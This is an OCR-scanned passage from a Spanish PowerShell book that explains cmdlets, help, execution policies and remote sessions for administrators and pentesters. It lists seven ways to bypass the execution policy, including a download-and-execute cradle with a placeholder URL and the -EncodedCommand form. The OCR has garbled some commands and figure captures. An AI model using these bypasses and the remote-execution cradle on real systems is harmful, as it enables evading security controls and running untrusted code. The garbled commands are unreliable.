ser  presentada  tambien  es  importante  y  esta  linea  de  comandos  los  valora.  En  PowerShell  se  puede 
observar  distintos  tipos  de  archivos.  Entre  los  mas  importantes  o  interesantes  se  encuentran: 

"  Archivo  de  datos.  Este  archivo  dispone  de  extension  .psdl  y  se  realiza  para  diversos 
propositos,  almacenar  el  manifiesto  de  un  modulo  o  almacenar  los  strings  para  la 
intemacionalizacion  del  script. 
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-  Archivo  de  modulo.  Este  archivo  tiene  extension  .psml  y  contiene  un  script.  Este  script 
define  los  miembros  que  se  exportan  de  el. 

-  Archivo  de  formato.  El  archivo  utiliza  una  extension  del  tipo  .format.ps  1  xml y  proporciona 
una  definicion  de  como  PowerShell  debe  mostrar  un  objeto. 

-  Archivo  de  script.  Este  es  el  mas  basico  de  todos,  ya  que  contiene  las  Hneas  que 
implementan  las  funcionalidades  que  se  quieren  automatizar.  La  extension  utilizada  por  este 
tipo  de  archivos  es  .psl.  En  otras  palabras.  este  tipo  de  archivos  contiene  el  codigo  que  se 
ejecutara  en  PowerShell. 

-  Archivo  de  tipo.  Este  archivo  dispone  la  extension  .pslxml  y  se  encarga  de  heredar  las 
propiedades  de  los  tipos  de  .NET  Framework. 

Es  importante  tener  en  cuenta  que  siendo  la  primera  vez  que  se  ejecute  PowerShell  el  usuario  se 
encontrara  con  la  negacion  de  la  linea  de  comandos  al  ejecutar  un  script.  Esto  es  debido  a  que 
la  politica  de  seguridad  definida  por  defecto  en  PowerShell  es  la  de  restricted .  lo  cual  evitara  la 
ejecucion  de  cualquier  script. 


Pipe  y  pipeline 

Un  pipe  tiene  una  definicion  clasica,  y  no  es  mas  que  una  tuberia  que  conecta  la  salida  de  un  proceso 
con  la  entrada  de  otro.  Dieho  de  otro  modo,  el  resultado  del  procesamiento  de  un  cmdlet  puede  salir, 
a  traves  del  pipe,  y  ser  la  entrada  de  otro  cmdlet .  Un  ejemplo  sencillo  scria  el  siguienle  <cmdlet  l> 
|  < cmdlet  2>. 

El  pipeline  es  el  conjunto  de  cmdlet  que  envian  sus  resultados  a  otro  cmdlet.  En  otras  palabras.  se 
conecta  la  salida  por  pantalla  que  devuelve  el  cmdlet  1  a  la  entrada  del  cmdlet  2.  este  ejecuta  y  los 
resultados  los  envia  al  cmdlet  3.  Este  proceso  se  repite  en  funcion  del  numero  de  concatenaciones 
quo  el  usuario  requiera. 


PS  C:\Users\bit > 

Get-Process 

!  sort 

-Descending  id 

!  Select-Object  -First  4 

Handles 

NPM<K> 

PI1<K> 

WSCK> 

UM<M> 

CPU<s> 

Id 

ProcessNane 

1465 

34 

87004 

116320 

251 

735,42 

4080 

c hr one 

140 

4 

2324 

8916 

34 

4020 

OSPPSUC 

129 

15 

41320 

53264 

171 

22,84 

3868 

chrone 

331 

16 

60340 

20388 

113 

3704 

suchost 

Fig.  1.07:  Ejecucion  en  un  pipeline 


Modulos 

Los  modulos  en  PowerShell  son  paquetes  que  permiten  extender  y  disponer  de  escalabilidad  en  el 
lenguaje  de  scripting  y  la  propia  interaccion  con  la  shell.  Los  modulos  agrupan  otros  scripts ,  cmdlets 
0  funciones  permitiendo  compartir  otras  funcionalidades  sin  tener  que  rescribirlas  en  el  codigo  del 
script. 

Sobre  todo  en  las  versiones  servidor  de  Windows  la  linea  de  comandos  proporciona  diferentes 
modulos  al  usuario.  Estos  modulos  proporcionan  funcionalidad  extra  e  interesante  para  llevar  a  cabo 
,a  Bastion  de  sistemas  y  productos  Microsoft.  Tambien  pueden  ser  utiles  en  escenarios  de  pentesting. 
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Los  modules,  en  general,  son  muy  utiles  para  compartir  y  beneficiar  a  otros  usuarios.  Existen 
cientos  de  funcionalidades  que  pueden  ser  compartidas  gracias  a  la  importation  de  modulos  en 
Pow  erShell.  Simplemente,  hay  que  recordar  los  frameworks  de  pentesting  disponibles  en  la  red.  y 
que  proporcionan  cientos  de  funcionalidades  que  pueden  ser  utilizadas. 

Para  visual izar  los  modulos  disponibles  se  ejecutaria  el  cmdlet  get-module  con  el  parametro 
List  Available,  de  la  siguiente  manera  get -module  - List  Available . 


6.  La  ayuda  en  PowerShell  al  detalle 

La  ayuda  en  la  linea  de  comandos  es  fundamental.  Hoy  dia  se  dispone  de  Internet  y  todos  los 
recursos  que  este  ofrece,  como  la  parte  Teclmet  de  Microsoft ,  pero  en  muchas  ocasiones.  lo  mas 
rapido  es  utilizar  la  ayuda  que  viene  con  la  propia  linea  de  comandos.  PowerShell  proporciona  una 
ayuda  clasificada  por  extension  de  information,  es  decir,  se  podra  obtener  information  con  mayor  o 
menor  detalle.  e  incluso  con  ejemplos. 

Existe  un  cmdlet  que  ejecuta  la  tarea  de  la  ayuda  denominado  get-help.  Existe  la  funcion  help  que 
es  muy  util  como  se  vera  posteriormente.  Existen  tarabien  alias  como  man.  nomenclatura  cercana  a 
los  entomos  *NIX.  Y  tambien  se  dispone  del  parametro,  comun  a  todos  los  cmdlet ,  -?  con  el  que  el 
usuario  puede  revisar  la  ayuda  del  cmdlet  en  cuestion. 

Hay  que  recalcar  que  la  ayuda  viene  en  el  idioma  dc  la  version  instalada,  esto  ayudara  a  muchos 
usuarios  a  podcr  entender  mejor  el  funcionamiento  de  PowerShell. 

Existen  3  niveles  de  profundidad  en  la  ayuda  de  PowerShell: 

-  Ayuda  por  defecto  o  estandar.  Cuando  se  ejecuta  el  cmdlet  get-help ,  alguno  de  sus  alias  o 
el  parametro  de  ayuda.  este  es  el  tipo  de  ayuda  que  se  ofrece  para  la  visualization  por  parte 
del  usuario.  No  incluira  ejemplos  en  la  ayuda. 

-  Ayuda  en  detalle  o  detallada.  La  information  que  se  ofrece  es  considerablemente 
mayor  que  en  la  ayuda  estandar.  Se  ofrece  gran  cantidad  de  ejemplos  de  uso  sobre  la  ayuda 
requerida.  Esta  ayuda  se  obtiene  ejecutando  el  parametro  derailed  e n  la  petition  de  la  ayuda, 
por  ejemplo.  get-help  <comando>  - detailed . 

-  Ayuda  completa.  La  information  que  se  ofrece  es,  tambien,  mayor  que  en  la  ayuda 
estandar.  Ademas  ofrece  information  tecnica  sobre  la  ayuda  requerida.  Para  obtener  esta 
ayuda  se  debe  ejecutar  ge/-/?e//?  <comando>  -full. 

Otra  option  para  mostrar  ejemplos  directamente  es  utilizar  el  parametro  examples ,  a  traves  de  la 
siguiente  instruction  Get-Help  <comando>  - examples .  Ademas,  la  ayuda  en  PowerShell  proporciona 
mas  information  que  la  que  se  ofrece  de  los  cmdlet.  Una  option  es  ejecutar  el  alias  help  *  y  sc 
obtendra  una  lista  con  todos  los  nombres,  categorias  y  sinopsis.  En  el  capitulo  de  scripting  puede 
ser  util  la  ayuda  de  las  estructuras  condiciones  o  de  bucles.  Para  invocarlas  se  puede  ejecutar  la 


instruction  help  if.  Cuando  se  obtiene  una  pagina  de  ayuda,  esta  se  divide  en  apartados  correctamente 
formateados  para  que  su  visualization  y  entendimiento  no  supongan  un  problema. 

^Help  o  get-help? 

Help  permite  visualizar  de  manera  sencilla  las  paginas  de  ayuda  de  la  linea  de  comandos.  ya  que 
la  salida  de  la  funcion  help  proporciona  las  paginas  formateadas.  Proporciona  diferentes  niveles  de 
profundidad,  como  puede  ser  en  detalle  o  completa.  El  cmdlet  Get-Help  saca  toda  la  informacidn 
por  la  salida  estandar  de  la  linea  de  comandos,  es  decir  por  pantalla,  sin  ningun  tipo  de  formato.  De 
esta  manera  se  puede  entender  que  help  y  Get-Help  pueden  parecer  iguales,  pero  no  lo  son.  Para 
equiparar  a  Get-Help  con  la  funcion  help  se  podria  utilizar  un  pipe  y  la  funcion  more  de  la  siguiente 
manera  Get-Help  <cmdlet>  -detailed  more. 

Categorias 

Cuando  se  ejecuta  la  sentencia  Get-Help  *  se  obtiene  una  columna  que  es  categoria.  Esta  columns 
indica  que  es  realmente  sobre  lo  que  se  solicita  la  ayuda.  Se  puede  observar  que  no  solo  existe  ayuda 
para  los  cmdlet. 

Las  distintas  categorias  de  la  ayuda  en  PowerShell  son  las  siguientes: 

-  Cmdlet. 

-  Provecdores. 

-  Funciones. 

-  Alias. 

-  Archive  de  ayuda. 

Los  archivos  de  ayuda  son  muy  interesantes  ya  que  ofrecen  information  detallada.  por  ejemplo, 
sobre  los  componentes  sintacticos  del  lenguaje  de  scripting  de  PowerShell.  Vienen  definidos  con 
una  gran  cantidad  de  ejemplos. 

Atajos  de  teclado 

Siempre  ban  sido  utiles  en  el  dia  a  dia  los  atajos  de  teclado,  y  mas  en  un  mundo  en  el  que  el  tiempo 
cada  vez  es  mas  necesario.  Por  este  tipo  de  razones  se  hace  hincapie  en  como  pueden  hacerse  uso  de 
estos  en  la  linea  de  comandos  PowerShell.  Al  principio,  estos  atajos  pueden  ser  dificiles  de  recordar. 
pero  su  uso  en  el  dia  a  dia  facilitara  la  rapida  interaction  con  la  linea  dc  comandos. 

Hay  diferentes  tipos  de  atajos  de  teclado,  todos  ellos  realmente  interesante.  El  primero  de  ellos  que 
se  presenta  es  el  uso  del  tabulador,  al  igual  que  se  hace  en  Bash.  A  partir  de  ahora  al  tabulador  se 
le  denominara  tab.  Con  la  tecla  tab  el  usuario  puede  autocompletar  o  ver  las  coincidencias  con  lo 
que  esta  buscando.  El  funcionamiento  de  tab  mediante  un  ejemplo  es  sencillo,  se  escribe  get  y  al 
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pulsar  sobre  tab  se  ira  visual izando  las  distintas  posibilidades  de  coincidencia  con  los  c/ndlet.  Tab  es 
aplicable  a  parametros  y  otros  elementos  del  entomo  de  PowerShell.  Otro  de  los  atajos  interesantes 
y  utiles  es  CTRL  +  Flecha  derecha  /  izquierda.  Esta  combination  permite  al  usuario  recorrer  una 
sentencia  palabra  a  palabra.  Ademas,  el  curso  es  colocado  al  principio  de  cada  una  de  las  palabras. 

Las  reclas  F7,  F8  y  F9  proporcionan  acceso  rapido  al  historico  de  instrucciones  ejecutadas.  La  tecla 
F7  proporciona  al  usuario  un  listado,  mediante  la  visualization  de  un  cuadro  de  dialogo  en  consola, 
de  las  ultimas  instrucciones  ejecutadas  en  el  entomo  actual.  La  tecla  F8  introduce  en  la  misma  linea 
de  comandos  las  ultimas  instrucciones,  para  que  directamente  el  usuario  pueda  ejecutarlas.  La  tecla 
F9  pregunta,  mediante  un  cuadro  de  dialogo  en  el  entomo,  por  el  numero  asociado  a  la  instruccion 
quc  se  puede  visualizar  con  F7. 

Mas  atajos  interesantes  con  CTRL  +  C,  con  el  cual  la  ejecucion  de  un  proceso  es  finalizada.  Ademas. 
la  tecla  IM1CIO  y  FIN  del  teclado,  situan  el  cursor  al  principio  o  al  final  de  la  linea  de  comandos. 
Esto  es  interesante.  sobre  todo  si  la  instruccion  es  larga  y  se  requiere  cambiar  algo.  Por  ultimo,  la 
flecha  arriba  y  abajo  permite  rcalizar  un  desplazamiento  por  el  historico  de  instrucciones  quc  han 
sido  ejecutadas  con  anterioridad  por  el  usuario. 


7.Seguridad  en  PowerShell 

Hoy  en  dfa  la  seguridad  ha  comenzado  a  ser  importante  en  un  entomo  empresarial,  e  incluso  para 
inuchos  usuarios  su  privacidad  y  confidencialidad  es  una  cuestion  importante  en  sus  vidas.  Por  estas 
razones.  la  seguridad  informatica  intenta  evitar  que  los  datos  e  information  mas  sensible  queden 
en  mano  de  los  usuarios  maliciosos.  Se  utilizan  politicas  para  evitar  que  ciertos  grupos  de  usuarios 
realicen  ciertas  acciones.  sc  cifran  contenidos  o  arehivos,  se  segmcntan  los  accesos  a  los  equipos,  se 
registrar!  esos  accesos.  etcetera. 

En  la  linea  de  comandos  de  PowerShell  existcn  diferentes  politicas  que  evitan  que  ciertos  scripts 
puedan  ser  ejecutados  por  cualquicr  usuario.  Existcn  ciertos  metodos  que  permiten  controlar  los 
permisos  sobre  los  ficheros,  incluso  metodos  o  funciones  que  fortifican  y  aseguran  las  cadenas  dc 
texto.  En  cicrtas  ocasiones  estas  medidas  no  son  suficientes  si  no  existe  una  configuracion  correcta 
del  entomo.  Las  dcbilidades  y  errores  de  configuracion  de  los  sistemas  pueden  provocar  errores 
importantes.  quc  pueden  acabar  en  una  elevation  del  privilegio  o  una  ejecucion  de  codigo  arbitrario 
sobre  un  sistema. 

c.Abrir  los  sistemas  al  scripting  o  realizar  las  rnismas  tareas  todos  los  dias  manualmente?  El  script 
puede  automatizar  la  realization  de  las  tareas,  pero  es  algo  con  lo  que  se  debe  tener  cuidado.  Al  igual 
que  ocurre  con  el  desarrollo  del  software,  hay  que  probar  los  scripts  en  un  entomo  de  no  production, 
ya  que  un  fallo  puede  acabar  en  una  catastrofe  para  la  organization.  A  priori,  sin  la  lectura  de  su 
codigo.  un  usuario  no  dispone  de  information  sobre  si  el  script  puede  ser  danino  para  el  sistema  o  el 
entorno.  PowerShell  aporta  conceptos,  como  los  mencionados  anteriormente,  para  evitar  los  riesgos 
comentados. 


Politicas  de  ejecucion  de  PowerShell 

La  linea  de  comandos  PowerShell  dispone  de  un  mecanismo  que  impide  que  un  script  se  ejecute  en 
cl  equipo.  Este  mecanismo  es  la  politica  de  ejecucion.  Como  se  ha  mencionado  anteriormente,  esta 
politica  de  ejecucion  dispone  de  diferentes  opciones  y  configuraciones.  En  un  entomo  laboral  se 
puede  utilizar  este  mecanismo  para  asegurar  que  aplicaciones  maliciosas  no  pueden  ejecutar  codigo 
en  el  equipo  para  tomar  ventaja  en  un  entorno  concreto. 

En  el  ambito  del  pentesting  tambien  puede  ser  un  obstaculo,  pero  existen  diversas  maneras  para 
realizar  un  bypass  de  la  politica  de  ejecucion.  Algunas  vias  para  realizar  este  bypass  son  triviales. 
pero  efectivas.  Hay  que  recordar  que  por  defecto  la  politica  configurada  en  los  equipos  es  restricted , 
es  decir  ningun  script  podra  ser  ejecutado  a  traves  de  la  linea  de  comandos. 

Microsoft  proporciona  la  politica  restricted  con  el  objetivo  de  que  los  administradores  tengan  que 
modificar  la  politica  o  realizar  acciones  concretas.  las  cuales  se  podran  ver  en  este  capitulo.  con  el 
fm  de  tener  conciencia  de  lo  que  se  esti  haciendo  en  todo  momento.  <,Por  que  realizar  un  bypass' 1  La 
necesidad  de  automatization  por  parte  de  un  usuario  cs  una  dc  las  respuestas  mas  comunes  o  logicas 
que  pueden  darse. 

Por  otro  lado.  si  se  observa  desde  el  punto  de  vista  del  atacante.  se  puede  suponer  un  escenario 
dbnde  este  tiene  acceso  fisico  a  un  equipo  y  tenga  la  necesidad  de  ejecutar  ordenes  desde  la  linea  de 
comandos.  La  linea  de  comandos  ha  llegado  a  ser  muy  popular  en  los  ultimos  afios  cn  el  mundo  del 
pentesting ,  ya  que  se  puede  lograr  realizar  infinitud  de  acciones  en  los  sistemas  Microsoft. 

fn  la  version  2  de  PowerShell  existen  2  politicas  extra,  como  son  bypass  y  undefined.  La  primera  es 
similar  a  unrestricted ,  no  bloquea  ninguno,  ni  muestra  mensaje  de  advertencia.  La  segunda  indica 
que  si  ningun  ambito  dispone  de  una  politica  de  ejecucion.  es  decir.  todas  son  undefined,  se  aplicara 
la  politica  por  defecto,  restricted. 

Para  consultar  la  politica  de  ejecucion  actual  se  dispone  del  cindlet  G et-Execut i onpoi in \  Para 
cambiar  la  politica  de  ejecucion  se  dispone  del  cmdlet  Set-Executionpol icy  <politica  a  cambiar> . 

Ambitos 

FI  usuario  debe  enlender  los  ambitos  de  PowerShell ,  al  menos  tener  una  idea  de  lo  que  son  y  como 
actuan.  Estos  aportan  cierta  riqueza  a  la  linea  de  comandos  y  las  acciones  que  se  realizan  en  el  la. 
Ademas.  proporcionan  distincion  a  las  politicas  de  ejecucion. 

Fn  la  primera  version  de  PowerShell  existia  unicamente  el  ambito  de  Local  Machine ,  sin  embargo 
con  la  aparicion  en  2009  de  la  version  2  aparecieron  otros  ambitos  que  se  detallan  a  continuation: 

-  Process:  La  politica  de  ejecucion  afccta  al  proceso  en  curso,  es  decir  a  la  sesion  de 
PowerShell.  Este  ambito  no  es  persistente. 

-  CurrentUser:  La  politica  de  ejecucion  afecta  al  usuario  actual.  Se  almacena  en  el  registro 
de  Windows  en  la  parte  correspond iente  al  usuario,  por  lo  que  es  persistente. 
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Local  Machine:  La  poli'tica  de  ejecucion  afecta  a  todos  los  usuarios  de  la  maquina.  Se 
almacena  de  manera  persistente  en  la  parte  del  registro  H KEY  LOCAL  MACHINE. 

La  aplicacion  de  las  politicas  de  ejecucion  tiene  una  prioridad.  Esta  prioridad  va  en  el  orden  en 
el  que  se  enunciaron  estas  en  el  parrafo  anterior.  En  otras  palabras,  la  mas  prioritaria  es  process , 
seguida  de  cnrrentuser  y  localmachine .  Cuando  la  politica  process  es  declarada  en  undefined ,  se 
aplica  la  politica  cnrrentuser.  Cuando  esta  tambien  se  declara  como  undefined ,  entonces  se  aplica 
la  de  localmachine.  Por  ultimo,  si  todos  los  ambitos  son  undefined ,  se  aplica  la  mas  restrictiva  por 
defecto,  es  decir,  restricted. 

El  cmdlet  Get- ExecutionPolicy  junto  al  parametro  -list  permite  obtener  las  politicas  de  ejecucion 
aplicadas  a  los  distintos  ambitos.  Para  configurar  una  politica  a  cualquier  ambito  se  debc  utilizar  el 
parametro  -scope  e  indicar  cl  ambito  de  trabajo. 


Bypass  a  la  politica  de  ejecucion  de  PowerShell 

Hay  diferentes  maneras  para  llevar  a  cabo  un  bypass  de  la  politica  de  ejecucion  de  PowerShell.  A 
continuation  se  enumeran  diferentes  posibilidades: 

1.  La  primera  y  mas  sencilla  de  todas  es  la  de  copiar  y  pegar  el  contenido  de  un  script  en  la 
consola  interactiva.  De  esta  manera  tan  sencilla,  y  teniendo  acceso  fisico  al  equipo  se  podran 
ejecutar  las  distintas  instrucciones  que  componen  el  script  que  no  se  puede  ejecutar. 

2.  Utilization  del  comando  echo  para  escribir  el  contenido  del  script  en  la  PowerShell  y  se  pasa 
el  contenido  a  traves  de  un  pipe  a  la  aplicacion  PowerShell.  Un  ejemplo  sencillo  de  esto  seria 
echo  write-host  “mi  bypass”  |  PowerShell  -noprofile  -  .  Otra  opcion  es  utilizar  el  comando  cat 
o  Get-Content  con  el  fin  de  leer  de  un  fichero  el  script  y  pasarle  las  instrucciones  a  traves  de  un 
pipe.  Por  ejemplo,  Get-Content  script.ps l  \  PowerShell.exe  -nopwfile  -. 

3.  Se  puede  utilizar  el  argumenlo  -command  cuando  se  lance  el  binario  PowerShell  en  la  linea 
de  comandos.  Como  ejemplo  se  muestra  el  siguiente:  PowerShell  -command  “ write-host  ‘ esto 
es  un  bypass"'. 

4.  Se  puede  utilizar  el  comando  lnvoke-Command.  Como  ejemplo  se  muestra  el  siguiente: 
/ n voke-Command  —Scriptblock  {write-host  'esto  es  un  bypass 

5.  Encodear  el  contenido  del  script  y  ejecutarlo  con  el  argumento  -EncodedCommand.  En 
primer  lugar  hay  que  almacenar  el  contenido  encodeudo  en  una  variable,  por  ejemplo  Scontenido 
=  " write-host  mi  bypass"':  Styles  -  [System.  Text.  Encoding]::  Unicode.  Get  Bytes  (Scontenido): 
Sencoded  —  [Convert]:  :ToBase64String(Sbytes).  Una  vez  que  se  tiene  el  texto  encodeado  se 
invoca  de  la  siguiente  manera  PowerShell.exe  EncodedCommand  Sencoded. 

6.  Se  puede  utilizar  el  flag  ExecutionPolicy.  La  sintaxis  para  ejecutar  la  instruction  seria  la 
siguiente  PowerShell -ExecutionPolicy  Bypass  -File  <script>.  Se  puede  utilizar  el  argumento  - 
ExecutionPolicy  para  indicar  la  politica  que  se  quiere  utilizar,  siendo  Bypass  una  politica  especial 
para  este  tipo  de  casos. 
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7.  Descargar  el  contenido  del  script  y  ejecutarlo  invocando  a  PowerShell.  El  ejemplo  de  esta 
via  seria  PowerShell  noprofile  c  "iexfNew-Object  Net.WebClienO.DownloadStringfdireccid 
nURL ') 


Como  se  puede  ver  algunas  de  los  bypass  son  obvios,  pero  muy  efectivos  cuando  el  pentester  tiene 
una  politica  que  le  bloquea.  Disponer  de  acceso  local  permite  que  el  usuario  pueda  utilizar  cualquiera 
de  estos  metodos  para  conseguir  saltarse  una  politica  que  le  restrinja.  Si  el  acceso  es  remoto,  se 
pueden  utilizar  algunas  como  por  ejemplo  la  septima  opcion  para  descargarse  el  contenido  a  ejecutar 
v  cargarlo  con  PowerShell. 

La  ejecucion  remota  y  como  comunicarse 

Administrar  sistemas  requiere  el  poder  consultar  y  ejecutar  tareas  sobre  maquinas  y  recursos 
con  ubicaciones  remotas  dentro  del  entorno  empresarial.  La  linea  de  comandos  de  PowerShell 
proporciona  la  posibilidad  de  llevar  a  cabo  esta  gestion  gracias  a  .NET  Framework.  En  algunas 
oeasiones  se  puede  requcrir  arrancar  una  sesion  remota  por  Io  que  es  necesario  disponer  de  Windows 
Remote  Management  2.0 .  que  por  defecto  viene  instalado  en  la  maquina  con  Windows  7/2008  R2. 

LI  requisito  para  poder  aprovecharse  dc  la  ejecucion  remota  en  cualquier  maquina  del  dominio  es 
tener  el  acceso  apropiado,  es  decir,  ser  miembro  del  grupo  adminislradores  de  la  maquina  remota 
o  ser  un  administrador  del  dominio.  PowerShell  lleva  a  cabo  la  operativa  de  autenticacion  con  las 
maquinas  remotas,  por  lo  que  es  imprescindible  lo  comentado  anteriormente  sobre  ser  miembro  de 
un  grupo  local  administrativo  o  del  dominio. 

Rn  este  punto  se  puede  autenticar  dos  usuarios  con  el  mismo  nombre  y  misma  contrasena  en 
maquinas  remotas.  por  ejemplo  el  administrador  local  de  la  maquina  A  tiene  la  misma  contrasena 
que  cl  administrador  local  de  la  maquina  B.  Esto  seria  lo  que  se  denomina  Pass  the  hash  implicito. 
pero  existe  una  opcion  para  poder  indicar  con  que  contrasena  o  credenciales  se  quiere  logucar  en  cl 
sistema  remoto. 


Creation  y  configuration  de  una  sesion  remota 

Existen  gran  cantidad  de  cmdlets  en  PowerShell  que  permiten  ejecutar  instrucciones  remotas. 
Por  ejemplo  para  listar  los  servicios  de  una  maquina  remota  sin  necesidad  de  Windows  Remote 
Management  2.0  sc  puede  utilizar  el  parametro  computername  como  se  menciono  anteriormente. 
Get-Service  -ComputerName  <nombremaquina>  -Name  EFS. 

Las  sesiones  remotas  pueden  ser  creadas  tras  habilitar  Windows  Remote  Management.  Para  llevar  a 
cabo  esta  action  puede  utilizarse  el  cmdlet  Enable-PSRemoiing.  Para  deshabilitar  la  gestion  remota 
sc  puede  utilizar  el  cmdlet  Disable-PSRemoting.  La  conexion  de  red  debe  cstar  en  un  perfil  de 
dominio  o  privado,  nunca  publico. 

()tro  error  muy  comun  es  que  el  host  al  que  el  usuario  quiera  conectarse  no  sea  de  confianza, 
ubteniendo  un  error  como  el  de  la  imagen. 
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|PS  C^\Windoua\3V5teo32>  New-PSSession-ConputerUm^i? 


|Cbit-pcl  Error  de  conexion 
esquena  de  autent icac ion 
insportc  HTTPS  o  agregar 


lie  -Credential  Screri 


6jne*1dKtli?SrHrKrh;^n«aft  di  e,*r°r:  ELclicnte  WinRM  no  puede  procesar  la  solicitud.  Si  el 
I  V1  51  oquipo  cllente  no  esta  unido  a  un  dominio.  se  dehe  ur.at*  el  tr 

-trHHnotr  T„_„.  et*ulP°  ”e  dc-tino  al  valor  de  conf  iguracion  TrustedHosts.  Uso  uinm.cmd  oara  configurar  Tru 

KSfcSsZsiSr  KW-.ES'i  !:,;s,L~'.-:sa"h.v.‘ih:  a 


_  _ _ ^  __  ing.  - - - *  ■  —  -  uuBmaciun,  consui.ee  ex  cema  ne  la  Ayud 

eptioJ690^10^0  :  °penE*'ror:  ^Systen.  Manage  ne - RenoteBunspace:RenoteBunspace>  [],  PSRenotingTrancportExc 

_♦  FullyQualif iedErrorld  :  PSScss ionOpen Failed _ 


Fig.  l  08:  Error  sobre  equipo  remoto  de  no  confianza. 


Para  solucionar  csto  se  deben  ariadir  al  archivo  de  equipos  de  confianza  los  equipos  remotos  que  se 
quieran  administrar.  Para  ello  se  ejecuta  la  siguiente  instruccion: 


JPS  C:\Windous\systen32>  Set-Iten  USMan:\locall.ost\Client\TrustcdHosts  -Ualue  bit-pc 
|Conf iguracion  de  seguridad  UinRM. 

Ja  lista  TrustedHosts  para  el  cliento  UinRM.  Los  equipos  de  la  licta  TrustedHosts  podrian 
Sota'llsta?’  E1  cllente  podrla  enoiar  infornacion  de  credenciales  a  cstos  equipos.  iEsta  seguro  de  quo  desea  !l 

|pfi3r-vmi!i«  oosPSndeSi>f.r?  JiftvudS  <o1  walo,‘  P»*edeterr»in«do  es  s 

PS  C-\UindousVsysten32>  Ncu-PSSess ion  ConputerNanc  bit-pc  -Credential  $cred 

if  Nawo  ConputerNanc  State  Conf igurationNane  Availability 

3  Session3 


que  desea  nodificar 


bit-pc 


Opened  Microsoft .PowerShell 


Fig.  1.09:  Correction  del  error  de  equipos  de  confianza. 


Como  curiosidad  indicar  que  el  valor  que  se  asigna  es  el  nombre  de  las  maquinas  las  cuales  se  toman 
como  de  confianza,  un  valor  es  posible  es  (*),  pero  no  es  aconsejable  su  uso  ya  que  se  tom  a  ri  an 
todos  los  nombres  de  maquina  posible  como  dc  confianza.  Este  ultimo  aporte  seria  negativo  para  la 
seguridad  empresarial. 


Una  vez  se  dispone  del  entorno  preparado  para  crear  las  sesioncs  remotas.  para  esta  funcion  se 
dispone  del  cmdlet  N exv-P SS ess  ion .  Este  cm  diet  dispone  de  bastantes  opciones  interesantes.  los 
cuales  sc  pueden  revisar  en  la  siguiente  tabla: 


Parametro 

Descripcion 

Credential 

Se  especifica  con  que  usuario  y  credenciales  se  quiere  iniciar  la  sesion 

Port 

Indica  el  puerto  al  que  se  conectara  PowerShell .  por  defecto  es  puerto  80 

ComputerName 

Crea  una  conexion  con  la  maquina  que  se  especifica,  la  sesion  es  persistenle 

UseSSL 

Utiliza  el  protocolo  SSL  para  establecer  la  conexion.  por  defecto.  no  se  usa 

SSL 

To blu  LOS:  Farametros  important  es  para  la  creation  de  sesiones. 


Para  crear  la  sesion  como  el  usuario  con  el  que  se  esta  logueado  en  el  sistema  local  hay  que  ejecutar 
New-PSSession  -ComputerName  <nombre  maquina> .  En  cualquier  instante.  puede  ser  necesario 
que  el  usuario  disponga  de  una  sesion  con  otro  usuario  conocido  en  la  maquina  remota.  Por  esta  razon, 
se  debe  ejecutar  la  siguiente  instruccion  Scred  =  get-credential;  new-PSSession  - ComputerName 
< nombre  mdquina>  -Credential  Scred.  Esta  instruccion  solicits  las  credenciales,  a  traves  del  cmdlet 
Get-Credential ,  y  despues  crea  la  sesion  indicando  las  credenciales  almacenadas  con  el  parametro 
Credential. 
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PS  C:'»Window3\3yatcn32>  $cr«jJ  -  Get-Credential 

cndlet  Get-Credential  en  la  posiciln  1  de  la  canalizacion  de  conandos 
Proporcione  ualores  para  los  par^netros  siguientes: 

Credential 

PS  C:\Windows \syctei»32>  $cred 

User Name 

bit-pcNpablo 

PS  C:NWindous\systen32>  Ncu-PSSession  -ConputerNanc  bit-pc  -Credential  $cred 
(d  Wane  ConputerNanc  State  Conf igurationNane  Availability 

Opened  Microsoft. PoucrShcll  Available 


6  SessionG 


bit-pc 


PS  C:sWindowsSayster>32> 


Password 


System. Security .Securest ring 


Fig.  1. 10:  Creadon  de  sesion  remota  con  otras  credenciales. 


Si  se  quiere  visualizar  que  sesiones  esian  disponibles  se  puede  utilizar  el  cmdlet  Get-PSSession .  Este 
cmdlet  devuelve  las  distintas  sesiones  que  pueden  haber  creadas,  ya  sean  locales  o  remotas. 


Las  ejecuciones  remotas 

C  uando  se  ha  creado  una  sesion  puede  resultar  inieresante  entender  como  se  puede  ejecutar 
instrucciones  remotas.  En  primer  lugar  se  tiene  que  tener  claro  que  para  poder  llevar  a  cabo  la 
ejecucion  de  estas  instrucciones  estas  deben  ser  especificadas  como  si  de  un  script  se  iraiase.  LI 
cmdlet  que  llevara  a  cabo  la  ejecucion  de  una  instruccidn  remota  es  Imoke-Command.  Este  cmdlet 
proporciona  al  usuario  2  parametros  como  son  -Session  y  -ScriptBlock.  El  primer  parametro  indica 
que  sesion  se  utilizara.  mientras  que  cl  segundo  indica  las  instrucciones  que  se  ejecutaran  en  remoto. 

Para  simplificar  este  concepto  un  pequeno  ejemplo.  si  se  quiere  ejecutar  instrucciones  en  remoto  a 
traves  de  una  sesion  se  puede  ejecutar  Jnvoke-Command  Session  <Objcto  Sessions  -ScriptBlock  / 
instruccion  l:  instruccion  2;  ...  ;  instruccion  N}.  Como  sc  menciono  antcriormente  para  visualizar 
las  distintas  sesiones  que  puede  haber  y  su  estado  se  dispone  de  Get-PSSession.  Para  obtener  una 
sesion  y  almacenarla  en  una  variable  se  puede  utilizar  la  siguiente  sentencia  Ssesion  -  Get-PSSesian 
id  V  .  Siendo  X  un  entero  que  identifica  la  sesion. 


IPS  C:\Windows \systen32>  Get-PSSession 

Id  Nane 

ConputerNarve 

State 

Conf igurat ionNarae 

fluailability 

1  Sessionl 

localhost 

Opened 

Microsoft .PowerShell 

Buailable 

2  Session2 

bit-pc 

Broken 

Microsoft .PowerShell 

None 

3  Session3 

bit-pc 

Broken 

Microsoft . PowerShell 

None 

4  Session4 

bit-pc 

Broken 

Microsoft .PowerShe 11 

None 

5  Sessions 

bit-pc 

Broken 

Microsoft . PowerShell 

None 

6  Session^ 

bit-pc 

Broken 

Microsoft .PowerShell 

None 

?  Session? 

bit-pc 

Opened 

Microsoft .PowerShell 

Available 

PS  C:\tJindous 

\syste»32>  Ssesion  = 

Get-PSSession  -id  7 

PS  C:\Uindov/s\s«;ste»32>  Inooke-Connand  -Session  $sesion  -ScriptBlock  <pwd> 

Path 

PSComputerNane 

(C:\Users\bit\Docuioents 

bit-pc 

_ 

Fig.  1. 11:  Flect  ion  de  la  sesion  y  ejecucion  de  una  instruct  ion  remota. 


I>ara  h^var  a  cabo  la  ejecucion  dc  varias  instrucciones  dentro  del  bloque.  como  sc  ha  indicado 
